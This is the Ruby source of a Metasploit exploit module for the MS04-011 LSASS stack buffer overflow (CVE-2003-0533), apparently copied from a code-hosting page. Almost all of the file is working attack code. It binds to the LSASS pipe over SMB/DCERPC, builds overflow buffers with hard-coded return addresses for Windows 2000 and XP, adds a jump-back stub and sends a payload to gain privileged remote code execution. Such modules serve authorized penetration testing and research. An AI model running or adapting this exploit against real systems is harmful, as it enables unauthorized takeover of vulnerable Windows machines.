metasploit-framework/modules/exploits/windows/smb/ms04_011_lsass.rb

158 lines
4.8 KiB
Ruby

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = GoodRanking
#
# This module exploits a vulnerability in the LSASS service
#
include Msf::Exploit::Remote::DCERPC
include Msf::Exploit::Remote::SMB::Client
def initialize(info = {})
super(update_info(info,
'Name' => 'MS04-011 Microsoft LSASS Service DsRolerUpgradeDownlevelServer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the LSASS service, this vulnerability
was originally found by eEye. When re-exploiting a Windows XP system, you will need
need to run this module twice. DCERPC request fragmentation can be performed by setting
'FragSize' parameter.
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2003-0533' ],
[ 'OSVDB', '5248' ],
[ 'BID', '10108' ],
[ 'MSB', 'MS04-011' ],
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread'
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
# Automatic
[
'Automatic Targetting',
{
'Rets' => [ ],
},
],
# Windows 2000
[
'Windows 2000 English',
{
'Rets' => [ 0x773242e0 ],
},
],
# Windows XP
[
'Windows XP English',
{
'Rets' => [ 0x7449bf1a ],
},
],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Apr 13 2004'))
end
def exploit
connect()
smb_login()
handle = dcerpc_handle('3919286a-b10c-11d0-9ba8-00c04fd92ef5', '0.0', 'ncacn_np', ['\lsarpc'])
print_status("Binding to #{handle}...")
dcerpc_bind(handle)
print_status("Bound to #{handle}...")
print_status('Getting OS information...')
# Check the remote OS name and version
os = smb_peer_os
buff = ''
case os
# Windows 2000 requires that the string be unicode formatted
# and give us a nice set of registers which point back to
# the un-unicoded data. We simply return to a nop sled that
# jumps over the return address, some trash, and into the
# final payload. Easy as pie.
when /Windows 5\.0/
str = rand_text_alphanumeric(3500)
str[2020, 4] = [targets[1]['Rets'][0]].pack('V')
str[2104, payload.encoded.length ] = payload.encoded
buff = NDR.UnicodeConformantVaryingString(str)
# Windows XP is a bit different, we need to use an ascii
# buffer and a jmp esp. The esp register points to an
# eight byte segment at the end of our buffer in memory,
# we make these bytes jump back to the beginning of the
# buffer, giving us about 1936 bytes of space for a
# payload.
when /Windows 5\.1/
str = rand_text_alphanumeric(7000) + "\x00\x00"
str[0, payload.encoded.length ] = payload.encoded
str[1964, 4] = [targets[2]['Rets'][0]].pack('V')
str[1980, 5] = "\xe9\x3f\xf8\xff\xff" # jmp back to payload
str[6998, 2] = "\x00\x00"
buff = NDR.UnicodeConformantVaryingStringPreBuilt(str)
# Unsupported target
else
print_status("No target is available for #{ os }")
return
end
stub = buff +
NDR.long(rand(0xFFFFFF)) +
NDR.UnicodeConformantVaryingString('') +
NDR.UnicodeConformantVaryingString('') +
NDR.UnicodeConformantVaryingString('') +
NDR.UnicodeConformantVaryingString('') +
NDR.long(rand(0xFFFFFF)) +
NDR.UnicodeConformantVaryingString('') +
NDR.long(rand(0xFFFFFF)) +
NDR.UnicodeConformantVaryingString('') +
NDR.long(rand(0xFFFFFF)) +
NDR.UnicodeConformantVaryingString('') +
rand_text(528) +
rand_text(528) +
NDR.long(rand(0xFFFFFF))
print_status("Trying to exploit #{os}")
begin
response = dcerpc_call(9, stub)
rescue Rex::Proto::DCERPC::Exceptions::NoResponse
print_status('Server did not respond, but that should be ok...')
rescue Rex::Proto::DCERPC::Exceptions::Fault
case $!.fault
when 0x1c010002
print_status('Server appears to have been patched')
else
print_status("Unexpected DCERPC fault 0x%.8x" % $!.fault)
end
end
# Perform any required client-side payload handling
handler
end
end